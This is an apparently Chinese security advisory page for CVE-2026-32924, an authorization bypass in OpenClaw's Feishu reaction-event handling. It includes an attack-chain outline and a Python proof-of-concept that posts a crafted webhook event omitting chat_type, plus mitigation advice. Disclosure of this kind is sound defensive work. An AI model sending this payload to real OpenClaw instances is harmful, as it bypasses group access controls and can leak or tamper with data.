IPBUF安全漏洞报告
English
CVE-2026-32924 CVSS 9.8 严重

CVE-2026-32924 OpenClaw授权绕过漏洞

披露日期: 2026-03-29

漏洞信息

漏洞编号
CVE-2026-32924
漏洞类型
授权绕过
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

授权绕过OpenClaw逻辑漏洞Feishu严重

漏洞概述

OpenClaw 2026.3.12之前的版本存在严重的授权绕过漏洞。当处理飞书(Feishu)反应事件时,如果数据中省略了chat_type字段,系统会将其错误地分类为P2P对话而非群聊。攻击者可利用此逻辑缺陷绕过groupAllowFrom和requireMention等安全保护机制,在群聊中执行未授权操作。

技术细节

该漏洞的根源在于OpenClaw对Feishu回调事件中chat_type字段的默认处理逻辑存在缺陷。在正常群聊反应事件中,应包含chat_type字段以标识其为群组环境。然而,当攻击者发送一个刻意省略该字段的恶意事件时,OpenClaw未能遵循“拒绝未知”的安全原则,而是将其默认归类为安全性较低的P2P会话。这种错误分类导致系统直接跳过了针对群聊设置的groupAllowFrom(来源白名单)和requireMention(必须@提及)校验逻辑。由于该漏洞允许无需认证(PR:N)且无需用户交互(UI:N)的网络攻击(AV:N),攻击者可轻易发送特制数据包触发受保护的功能,从而导致信息泄露、数据篡改或服务中断,对系统机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用的是OpenClaw且版本低于2026.3.12。
STEP 2
构造载荷
攻击者构造一个Feishu reaction事件JSON数据,故意省略其中的'chat_type'字段。
STEP 3
发送请求
攻击者通过网络向OpenClaw的Webhook接口发送该恶意数据包。
STEP 4
触发漏洞
OpenClaw接收到事件,因缺少chat_type将其误判为P2P会话。
STEP 5
绕过防御
系统跳过针对群聊的groupAllowFrom和requireMention检查。
STEP 6
执行攻击
攻击者在未授权的情况下触发机器人功能,导致数据泄露或破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target OpenClaw Webhook URL target_url = 'http://target-openclaw-instance/webhook' # Payload simulates a Feishu reaction event # Exploit: 'chat_type' is omitted to trigger misclassification as P2P payload = { "token": "verify_token", "challenge": "challenge_code", "type": "event_callback", "event": { "operator": {"user_id": "attacker_id"}, "reaction": {"emoji_type": "thumbsup", "emoji": "\ud83d\udc4d"}, "chat_id": "group_chat_id", "open_chat_id": "oc_group_id", "app_id": "app_id", "timestamp": "1640000000", "event_type": "reaction_added" # CRITICAL: 'chat_type' field is missing here } } headers = {'Content-Type': 'application/json'} try: response = requests.post(target_url, data=json.dumps(payload), headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}")except Exception as e: print(f"An error occurred: {e}")

影响范围

OpenClaw < 2026.3.12

防御指南

临时缓解措施
建议在未升级版本前,在防火墙或反向代理层面对OpenClaw的接收端点实施严格的IP访问控制,仅允许Feishu官方服务器的IP地址进行连接。同时,应密切监控日志中是否存在缺少chat_type字段的异常请求,一旦发现立即阻断来源IP。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表